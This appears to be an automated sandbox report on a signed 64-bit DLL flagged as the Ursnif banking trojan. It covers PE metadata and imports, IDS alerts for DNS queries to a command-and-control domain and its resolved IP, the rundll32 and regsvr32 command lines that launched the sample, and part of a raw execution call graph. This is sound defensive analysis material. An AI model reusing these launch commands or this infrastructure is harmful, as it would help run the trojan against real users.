                              • 7/5/2021 5:00:00 PM 7/6/2022 4:59:59 PM
                              Subject Chain
                              • CN=NAILS UNLIMITED LIMITED, O=NAILS UNLIMITED LIMITED, L=DORCHESTER, S=Dorset, C=GB
                              Version:3
                              Thumbprint MD5:71834A68FD130C9D08796B4F19A6FC67
                              Thumbprint SHA-1:CA69087AAAA087346202AD16228337130511C4C5
                              Thumbprint SHA-256:F13E4801E13898E839183E3305E1DDA7F4C0EBF6EAF7553E18C1DDD4EDC94470
                              Serial:2F96A89BFEC6E44DD224E8FD7E72D9BB
                              Programming Language:
                              • [C++] VS2015 UPD3.1 build 24215
                              • [EXP] VS2015 UPD3.1 build 24215
                              • [LNK] VS2015 UPD3.1 build 24215
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x371c0 | 0x94 | .rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x37254 | 0x28 | .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x46000 | 0x15cc | .pdata
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x44600 | 0x2908 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x49000 | 0x618 | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x34dd0 | 0x1c | .rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34df0 | 0x94 | .rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x23000 | 0x2a8 | .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0x21390 | 0x21400 | False | 0.6091694078947368 | zlib compressed data | 6.321988758719223 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata | 0x23000 | 0x14b40 | 0x14c00 | False | 0.5551228350903614 | data | 5.589680054404924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data | 0x38000 | 0xd378 | 0xc200 | False | 0.581286243556701 | data | 4.475772855701728 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .pdata | 0x46000 | 0x15cc | 0x1600 | False | 0.49556107954545453 | data | 5.3249872988992655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .gfids | 0x48000 | 0x94 | 0x200 | False | 0.248046875 | data | 1.4095612964443904 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0x49000 | 0x618 | 0x800 | False | 0.54150390625 | data | 4.760086879502757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              DLL | Import
                              KERNEL32.dll | CreateFileA, LockFile, ReadFile, SetEndOfFile, UnlockFile, CloseHandle, PeekNamedPipe, HeapCreate, HeapAlloc, HeapFree, GetProcessHeap, HeapWalk, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObject, ExitProcess, CreateThread, VirtualAlloc, GetProcAddress, CreateFileMappingA, LoadLibraryA, CreateNamedPipeA, CallNamedPipeA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetCurrentProcess, TerminateProcess, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, GetStringTypeW, CreateFileW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, WriteConsoleW, RaiseException
                              Name | Ordinal | Address
                              DllRegisterServer | 1 | 0x180002380
                              ItsnPq5v | 2 | 0x180002390
                              QlqYo259k | 3 | 0x180017c20
                              XeFnYZ409 | 4 | 0x1800175e0
                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                              11/24/22-05:22:35.810533 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 64906 | 53 | 192.168.2.4 | 8.8.8.8
                              11/24/22-05:20:02.978332 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 61007 | 53 | 192.168.2.4 | 8.8.8.8
                              11/24/22-05:21:04.451832 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 61124 | 53 | 192.168.2.4 | 8.8.8.8
                              11/24/22-05:21:34.871041 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 59444 | 53 | 192.168.2.4 | 8.8.8.8
                              11/24/22-05:22:05.359167 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 55570 | 53 | 192.168.2.4 | 8.8.8.8
                              11/24/22-05:20:33.386749 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 60686 | 53 | 192.168.2.4 | 8.8.8.8
                              11/24/22-05:23:06.390786 | UDP | 2039645 | ET TROJAN Observed DNS Query to Ursnif Domain (gigimas .xyz) | 59446 | 53 | 192.168.2.4 | 8.8.8.8
                              Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                              Nov 24, 2022 05:31:42.716654062 CET  53975        53         192.168.2.3  8.8.8.8
                              Nov 24, 2022 05:31:42.749726057 CET  53           53975      8.8.8.8      192.168.2.3
                              Nov 24, 2022 05:32:13.117352009 CET  51139        53         192.168.2.3  8.8.8.8
                              Nov 24, 2022 05:32:13.137461901 CET  53           51139      8.8.8.8      192.168.2.3
                              Nov 24, 2022 05:32:43.461288929 CET  52955        53         192.168.2.3  8.8.8.8
                              Nov 24, 2022 05:32:43.481966019 CET  53           52955      8.8.8.8      192.168.2.3
                              Nov 24, 2022 05:33:13.880306959 CET  60582        53         192.168.2.3  8.8.8.8
                              Nov 24, 2022 05:33:13.900351048 CET  53           60582      8.8.8.8      192.168.2.3

                              Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name         Type            Class        DNS over HTTPS
                              Nov 24, 2022 05:31:42.716654062 CET  192.168.2.3  8.8.8.8  0xefb3    Standard query (0)  gigimas.xyz  A (IP address)  IN (0x0001)  false
                              Nov 24, 2022 05:32:13.117352009 CET  192.168.2.3  8.8.8.8  0x493d    Standard query (0)  gigimas.xyz  A (IP address)  IN (0x0001)  false
                              Nov 24, 2022 05:32:43.461288929 CET  192.168.2.3  8.8.8.8  0x7cb8    Standard query (0)  gigimas.xyz  A (IP address)  IN (0x0001)  false
                              Nov 24, 2022 05:33:13.880306959 CET  192.168.2.3  8.8.8.8  0xb47a    Standard query (0)  gigimas.xyz  A (IP address)  IN (0x0001)  false

                              Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name         CName  Address         Type            Class        DNS over HTTPS
                              Nov 24, 2022 05:31:42.749726057 CET  8.8.8.8    192.168.2.3  0xefb3    No error (0)  gigimas.xyz         185.250.148.35  A (IP address)  IN (0x0001)  false
                              Nov 24, 2022 05:32:13.137461901 CET  8.8.8.8    192.168.2.3  0x493d    No error (0)  gigimas.xyz         185.250.148.35  A (IP address)  IN (0x0001)  false
                              Nov 24, 2022 05:32:43.481966019 CET  8.8.8.8    192.168.2.3  0x7cb8    No error (0)  gigimas.xyz         185.250.148.35  A (IP address)  IN (0x0001)  false
                              Nov 24, 2022 05:33:13.900351048 CET  8.8.8.8    192.168.2.3  0xb47a    No error (0)  gigimas.xyz         185.250.148.35  A (IP address)  IN (0x0001)  false

                              Target ID:0
                              Start time:05:30:30
                              Start date:24/11/2022
                              Path:C:\Windows\System32\loaddll64.exe
                              Wow64 process (32bit):false
                              Commandline:loaddll64.exe "C:\Users\user\Desktop\pzG0rkIchr.dll"
                              Imagebase:0x7ff719eb0000
                              File size:139776 bytes
                              MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:1
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff745070000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:2
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
                              Imagebase:0x7ff707bb0000
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:3
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll
                              Imagebase:0x7ff64da50000
                              File size:24064 bytes
                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:4
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:5
                              Start time:05:30:31
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,DllRegisterServer
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:6
                              Start time:05:30:36
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,ItsnPq5v
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:8
                              Start time:05:30:40
                              Start date:24/11/2022
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32.exe C:\Users\user\Desktop\pzG0rkIchr.dll,QlqYo259k
                              Imagebase:0x7ff6f9b90000
                              File size:69632 bytes
                              MD5 hash:73C519F050C20580F8A62C849D49215A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:12
                              Start time:05:30:50
                              Start date:24/11/2022
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6044 -s 276
                              Imagebase:0x7ff679980000
                              File size:494488 bytes
                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:13
                              Start time:05:30:50
                              Start date:24/11/2022
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
                              Imagebase:0x7ff679980000
                              File size:494488 bytes
                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:14
                              Start time:05:31:19
                              Start date:24/11/2022
                              Path:C:\Windows\System32\WerFault.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
                              Imagebase:0x7ff679980000
                              File size:494488 bytes
                              MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:34.3%
                                Signature Coverage:12.8%
                                Total number of Nodes:1751
                                Total number of Limit Nodes:20
10551 7ffc130e9af5 10549->10551 10552 7ffc130e9b5c __scrt_fastfail 10550->10552 10553 7ffc130e9b2d RtlAllocateHeap 10550->10553 10551->10547 10552->10547 10553->10552 10555 7ffc130e1f53 10554->10555 10555->10546 10555->10555 10557 7ffc130fedfe 10556->10557 10560 7ffc130fef01 10556->10560 10558 7ffc130ff060 CreateNamedPipeA 10557->10558 10557->10560 10559 7ffc130e8bf0 23 API calls 10558->10559 10559->10557 10560->10498 10562 7ffc130e20a8 10561->10562 10564 7ffc130e20b6 10561->10564 10563 7ffc130e2330 CreateThread 10562->10563 10562->10564 10563->10563 10563->10564 10564->10461 10564->10564 10566 7ffc130fd6aa 10565->10566 10570 7ffc130fd72e 10565->10570 10567 7ffc130fd7e0 10566->10567 10568 7ffc130fd6c0 10566->10568 10567->10570 10571 7ffc130fe7e0 3 API calls 10567->10571 10569 7ffc130e9ac0 2 API calls 10568->10569 10569->10570 10570->10468 10571->10567 10573 7ffc130fa881 10572->10573 10575 7ffc130fa7cd 10572->10575 10574 7ffc130ea2f0 24 API calls 10573->10574 10573->10575 10574->10575 10575->10476 10577 7ffc130f9699 10576->10577 10578 7ffc130f98d3 10576->10578 10579 7ffc130f96b4 10577->10579 10580 7ffc130f9723 10577->10580 10578->10416 10581 7ffc130e9ac0 2 API calls 10579->10581 10582 7ffc130f96e0 10580->10582 10583 7ffc130f9778 LeaveCriticalSection 10580->10583 10581->10582 10582->10416 10584 7ffc130ea4f0 9 API calls 10583->10584 10584->10580 10587 7ffc130e9234 10585->10587 10586 7ffc130e93b8 10586->10410 10587->10586 10588 7ffc130e9434 10587->10588 10589 7ffc130fed60 23 API calls 10588->10589 10590 7ffc130e9560 DeleteCriticalSection 10589->10590 10590->10586 10592 7ffc130f9361 10591->10592 10593 7ffc130ea3d6 10591->10593 10592->10593 10594 7ffc130f9f80 24 API calls 10592->10594 10595 7ffc130fbf00 10593->10595 10594->10593 10598 7ffc130fbf64 10595->10598 10596 7ffc130fc49b 10596->10423 10597 7ffc130fd080 ExitProcess 10597->10598 10598->10596 10598->10597 10600 7ffc130ea2de 10599->10600 10601 7ffc130ea2ae GetProcessHeap 10599->10601 10600->10305 10601->10600 10602 
7ffc130ea2ca HeapFree 10601->10602 10602->10600 10604 7ffc130e6deb VirtualAlloc 10603->10604 10605 7ffc130e6e2c 10603->10605 10606 7ffc130e70f7 10604->10606 10607 7ffc130e2a70 6 API calls 10605->10607 10606->10433 10608 7ffc130e6edf 10607->10608 10612 7ffc130f98f0 10608->10612 10611 7ffc130fa750 24 API calls 10611->10606 10613 7ffc130f9cf0 10612->10613 10617 7ffc130e6f86 10612->10617 10618 7ffc130e9ba0 10613->10618 10615 7ffc130f9e24 10616 7ffc130f7c20 158 API calls 10615->10616 10616->10617 10617->10611 10620 7ffc130e9cc2 10618->10620 10619 7ffc130e9da4 10619->10615 10620->10619 10621 7ffc130e1b10 24 API calls 10620->10621 10622 7ffc130e9f35 10621->10622 10623 7ffc130f7c20 158 API calls 10622->10623 10624 7ffc130ea050 10623->10624 10629 7ffc130ff160 10624->10629 10627 7ffc130fcdf0 25 API calls 10628 7ffc130ea21a CreateThread 10627->10628 10628->10615 10630 7ffc130ff209 10629->10630 10631 7ffc130ea15f 10629->10631 10630->10631 10632 7ffc130ff230 PeekNamedPipe 10630->10632 10631->10627 10632->10631 10632->10632 10634 7ffc130faac9 10633->10634 10637 7ffc130e4923 10633->10637 10635 7ffc130ea4f0 9 API calls 10634->10635 10634->10637 10636 7ffc130fab80 10635->10636 10638 7ffc130e5840 161 API calls 10636->10638 10644 7ffc130e7120 10637->10644 10639 7ffc130fabff 10638->10639 10640 7ffc130fed60 24 API calls 10639->10640 10641 7ffc130facd2 10640->10641 10641->10637 10666 7ffc130fdb20 10641->10666 10643 7ffc130fad80 10643->10637 10645 7ffc130e7238 10644->10645 10646 7ffc130e49ab LoadLibraryA 10644->10646 10647 7ffc130e7368 10645->10647 10648 7ffc130e7246 10645->10648 10653 7ffc130e2730 10646->10653 10650 7ffc130e744c WaitForSingleObject UnlockFile 10647->10650 10651 7ffc130e72ab 10647->10651 10649 7ffc130f98f0 160 API calls 10648->10649 10649->10651 10650->10651 10651->10646 10652 7ffc130fa750 24 API calls 10651->10652 10652->10646 10654 7ffc130e27d1 10653->10654 10659 7ffc130e2875 10653->10659 10655 7ffc130e28bd 10654->10655 10656 7ffc130e27d9 10654->10656 10658 
7ffc130fcdf0 25 API calls 10655->10658 10655->10659 10657 7ffc130e2850 GetProcAddress 10656->10657 10656->10659 10657->10659 10658->10655 10659->10316 10659->10659 10661 7ffc130e107b 10660->10661 10662 7ffc130e1092 GetProcAddress 10660->10662 10661->10662 10663 7ffc130e10fb 10662->10663 10664 7ffc130e10f1 10662->10664 10663->10310 10664->10663 10665 7ffc130e1179 HeapWalk 10664->10665 10665->10663 10665->10664 10667 7ffc130fdb6a 10666->10667 10668 7ffc130fdba4 10666->10668 10672 7ffc130fdc51 10667->10672 10673 7ffc130fb9b0 10667->10673 10671 7ffc130e8bf0 24 API calls 10668->10671 10668->10672 10670 7ffc130fdb93 10670->10643 10671->10672 10672->10643 10674 7ffc130fbeec 10673->10674 10679 7ffc130fb9f6 10673->10679 10674->10670 10675 7ffc130fbedc 10675->10670 10676 7ffc130fba40 LoadLibraryA 10676->10679 10677 7ffc130fbeb8 10677->10670 10678 7ffc130fbd3c GetProcAddress 10678->10679 10679->10675 10679->10676 10679->10677 10679->10678 10681 7ffc130fd581 10680->10681 10683 7ffc130fd3a3 10680->10683 10682 7ffc130fd5b0 GetProcessHeap 10681->10682 10681->10683 10682->10682 10682->10683 10683->10354 10685 7ffc130e82f8 10684->10685 10686 7ffc130e8373 10684->10686 10689 201640c6958 10685->10689 10686->10360 10690 201640c697b 10689->10690 10691 201640c6967 10689->10691 10710 201640c6ce4 10690->10710 10695 201640c6973 10691->10695 10697 201640c4db4 HeapCreate 10691->10697 10695->10360 10696 201640c698e HeapDestroy 10696->10695 10698 201640c4df5 10697->10698 10709 201640c4f01 10697->10709 10699 201640c4e94 10698->10699 10702 201640c4e26 HeapAlloc 10698->10702 10700 201640c4e9d HeapDestroy 10699->10700 10701 201640c4ea8 HeapAlloc 10699->10701 10700->10709 10703 201640c4ee1 10701->10703 10704 201640c4ed1 HeapDestroy 10701->10704 10705 201640c4e4b 10702->10705 10724 201640c487a memset 10703->10724 10704->10709 10705->10699 10707 201640c4eee 10708 201640c37e0 123 API calls 10707->10708 10708->10709 10709->10695 10711 201640c6d06 10710->10711 10712 201640c6982 10711->10712 10719 
201640c6d2b 10711->10719 10726 201640c908c 10711->10726 10712->10695 10712->10696 10713 201640c6d5c 10716 201640c908c SetLastError 10713->10716 10720 201640c6d71 10713->10720 10715 201640c908c SetLastError 10715->10719 10716->10720 10717 201640c6d9f 10721 201640c908c SetLastError 10717->10721 10718 201640c6d85 HeapFree 10718->10717 10719->10713 10719->10715 10720->10717 10720->10718 10722 201640c6dad HeapFree 10721->10722 10722->10712 10725 201640cc060 10724->10725 10729 201640c90a0 10726->10729 10727 201640c90c3 SetLastError 10728 201640c90ce 10727->10728 10728->10719 10729->10727 10729->10728 10731 7ffc130e2415 10730->10731 10739 7ffc130e24cc 10730->10739 10732 7ffc130e2429 10731->10732 10736 7ffc130e25c8 10731->10736 10733 7ffc130e9ac0 2 API calls 10732->10733 10735 7ffc130e2457 10733->10735 10734 7ffc130e263a 10737 7ffc130e2060 CreateThread 10734->10737 10738 7ffc130ff160 PeekNamedPipe 10735->10738 10736->10734 10736->10736 10736->10739 10737->10739 10738->10739 10739->10386 10741 7ffc130f7677 10740->10741 10743 7ffc130f76c5 10740->10743 10742 7ffc130ea280 2 API calls 10741->10742 10746 7ffc130f7873 10741->10746 10744 7ffc130f769b 10742->10744 10745 7ffc130e90b0 24 API calls 10743->10745 10743->10746 10744->10383 10745->10746 10746->10383 11828 7ffc130ee000 11829 7ffc130ee031 11828->11829 11830 7ffc130ee019 11828->11830 11831 7ffc130ee114 __free_lconv_num 15 API calls 11829->11831 11830->11829 11832 7ffc130ee114 __free_lconv_num 15 API calls 11830->11832 11833 7ffc130ee044 11831->11833 11832->11829 11834 7ffc130ee114 __free_lconv_num 15 API calls 11833->11834 11835 7ffc130ee059 11834->11835 11836 7ffc130ee114 __free_lconv_num 15 API calls 11835->11836 11837 7ffc130ee06c 11836->11837 11838 7ffc130ee114 __free_lconv_num 15 API calls 11837->11838 11839 7ffc130ee07f 11838->11839 11148 7ffc130f32b8 11149 7ffc130f32c0 11148->11149 11150 7ffc130f32d5 11149->11150 11152 7ffc130f32ee 11149->11152 11151 7ffc130ee6a0 _get_daylight 15 API calls 11150->11151 11153 
7ffc130f32da 11151->11153 11154 7ffc130ee2e4 36 API calls 11152->11154 11156 7ffc130f32e5 11152->11156 11155 7ffc130ee580 _invalid_parameter_noinfo 32 API calls 11153->11155 11154->11156 11155->11156 11157 7ffc130eb7b4 11164 7ffc130ec810 11157->11164 11162 7ffc130ec824 22 API calls 11163 7ffc130eb7c1 11162->11163 11170 7ffc130ec984 11164->11170 11167 7ffc130ee0a4 11168 7ffc130ef168 _get_daylight 15 API calls 11167->11168 11169 7ffc130eb7ca 11168->11169 11169->11162 11169->11163 11171 7ffc130ec9a3 GetLastError 11170->11171 11172 7ffc130eb7bd 11170->11172 11173 7ffc130ecd90 __vcrt_FlsGetValue 6 API calls 11171->11173 11172->11163 11172->11167 11174 7ffc130ec9b6 11173->11174 11175 7ffc130eca21 SetLastError 11174->11175 11176 7ffc130ec9c6 11174->11176 11177 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11174->11177 11175->11172 11176->11175 11178 7ffc130ec9d6 11177->11178 11178->11175 11179 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11178->11179 11180 7ffc130ec9e7 11179->11180 11181 7ffc130ec9fd 11180->11181 11182 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11180->11182 11183 7ffc130ecde4 __vcrt_FlsSetValue 6 API calls 11181->11183 11184 7ffc130eca0e 11181->11184 11182->11181 11183->11184 11185 7ffc130ee114 __free_lconv_num 15 API calls 11184->11185 11185->11175 11840 201640c2a8c 11841 201640c908c SetLastError 11840->11841 11842 201640c2ac1 11841->11842 11843 201640c2add 11842->11843 11844 201640c2c91 11842->11844 11845 201640c908c SetLastError 11843->11845 11846 201640c908c SetLastError 11844->11846 11852 201640c2ae7 11845->11852 11847 201640c2c9b 11846->11847 11848 201640c2d69 11847->11848 11850 201640c908c SetLastError 11847->11850 11849 201640c908c SetLastError 11848->11849 11851 201640c2c8c 11849->11851 11854 201640c2cd4 11850->11854 11853 201640c908c SetLastError 11851->11853 11852->11851 11862 201640c908c SetLastError 11852->11862 11864 201640c49c8 11852->11864 11871 201640c4bb0 11852->11871 11889 201640c5e88 11852->11889 11856 201640c2d95 11853->11856 
11854->11848 11855 201640c908c SetLastError 11854->11855 11859 201640c2cfc 11855->11859 11857 201640c908c SetLastError 11857->11859 11859->11848 11859->11857 11860 201640c4bb0 SetLastError 11859->11860 11860->11859 11862->11852 11895 201640c8b78 11864->11895 11866 201640c4a38 11866->11852 11867 201640c908c SetLastError 11868 201640c49f9 11867->11868 11868->11866 11868->11867 11869 201640c4a3a 11868->11869 11869->11866 11870 201640c908c SetLastError 11869->11870 11870->11866 11872 201640c4be4 11871->11872 11873 201640c908c SetLastError 11872->11873 11888 201640c4d36 11872->11888 11875 201640c4c37 11873->11875 11874 201640c4d59 11874->11852 11877 201640c908c SetLastError 11875->11877 11878 201640c4c57 11877->11878 11879 201640c908c SetLastError 11878->11879 11880 201640c4ca6 11879->11880 11904 201640c8470 11880->11904 11883 201640c908c SetLastError 11884 201640c4cee 11883->11884 11885 201640c908c SetLastError 11884->11885 11886 201640c4d09 11885->11886 11887 201640c908c SetLastError 11886->11887 11887->11888 11888->11874 11907 201640c9ccc 11888->11907 11890 201640c5ea6 11889->11890 11894 201640c5ed1 11889->11894 11891 201640c908c SetLastError 11890->11891 11892 201640c5eb4 11891->11892 11893 201640c908c SetLastError 11892->11893 11893->11894 11894->11852 11896 201640c487a memset 11895->11896 11897 201640c8bae 11896->11897 11898 201640c8c3a 11897->11898 11899 201640c908c SetLastError 11897->11899 11898->11868 11900 201640c8bc5 11899->11900 11901 201640c908c SetLastError 11900->11901 11902 201640c8c0d 11901->11902 11902->11898 11903 201640c908c SetLastError 11902->11903 11903->11898 11905 201640c908c SetLastError 11904->11905 11906 201640c4ccb 11905->11906 11906->11874 11906->11883 11908 201640c5e88 SetLastError 11907->11908 11909 201640c9ce9 11908->11909 11910 201640c5e88 SetLastError 11909->11910 11911 201640c9cf1 11910->11911 11912 201640c908c SetLastError 11911->11912 11916 201640c9d40 11911->11916 11913 201640c9d06 11912->11913 11914 201640c908c SetLastError 
11913->11914 11917 201640c9d24 11913->11917 11914->11917 11915 201640c908c SetLastError 11915->11916 11916->11874 11917->11915 11918 201640c118c 11919 201640c908c SetLastError 11918->11919 11921 201640c11ab 11919->11921 11920 201640c11da 11921->11920 11922 201640c908c SetLastError 11921->11922 11922->11920 11923 7ffc130f0e30 11924 7ffc130f0e3c 11923->11924 11926 7ffc130f0e63 11924->11926 11927 7ffc130f3a70 11924->11927 11928 7ffc130f3a75 11927->11928 11929 7ffc130f3ab0 11927->11929 11930 7ffc130f3aa8 11928->11930 11931 7ffc130f3a96 DeleteCriticalSection 11928->11931 11929->11924 11932 7ffc130ee114 __free_lconv_num 15 API calls 11930->11932 11931->11930 11931->11931 11932->11929 11933 201640c6488 11934 201640c64b0 11933->11934 11935 201640c908c SetLastError 11934->11935 11936 201640c64c0 11935->11936 11937 201640c908c SetLastError 11936->11937 11938 201640c64e8 11937->11938 11939 201640c9ccc SetLastError 11938->11939 11940 201640c64fb 11939->11940 11031 7ffc130ed8ac 11032 7ffc130ed8c5 11031->11032 11033 7ffc130ed8c1 11031->11033 11034 7ffc130f05f8 49 API calls 11032->11034 11035 7ffc130ed8ca 11034->11035 11043 7ffc130f0a40 GetEnvironmentStringsW 11035->11043 11038 7ffc130ed8d7 11041 7ffc130ee114 __free_lconv_num 15 API calls 11038->11041 11041->11033 11042 7ffc130ee114 __free_lconv_num 15 API calls 11042->11038 11044 7ffc130f0a6e WideCharToMultiByte 11043->11044 11045 7ffc130f0b12 11043->11045 11044->11045 11049 7ffc130f0ac8 11044->11049 11047 7ffc130ed8cf 11045->11047 11048 7ffc130f0b1c FreeEnvironmentStringsW 11045->11048 11047->11038 11055 7ffc130ed918 11047->11055 11048->11047 11050 7ffc130ee154 _onexit 16 API calls 11049->11050 11051 7ffc130f0ad0 11050->11051 11052 7ffc130f0ad8 WideCharToMultiByte 11051->11052 11053 7ffc130f0aff 11051->11053 11052->11053 11054 7ffc130ee114 __free_lconv_num 15 API calls 11053->11054 11054->11045 11056 7ffc130ed939 11055->11056 11057 7ffc130ee26c __vcrt_getptd_noexit 15 API calls 11056->11057 11066 7ffc130ed967 11057->11066 11058 
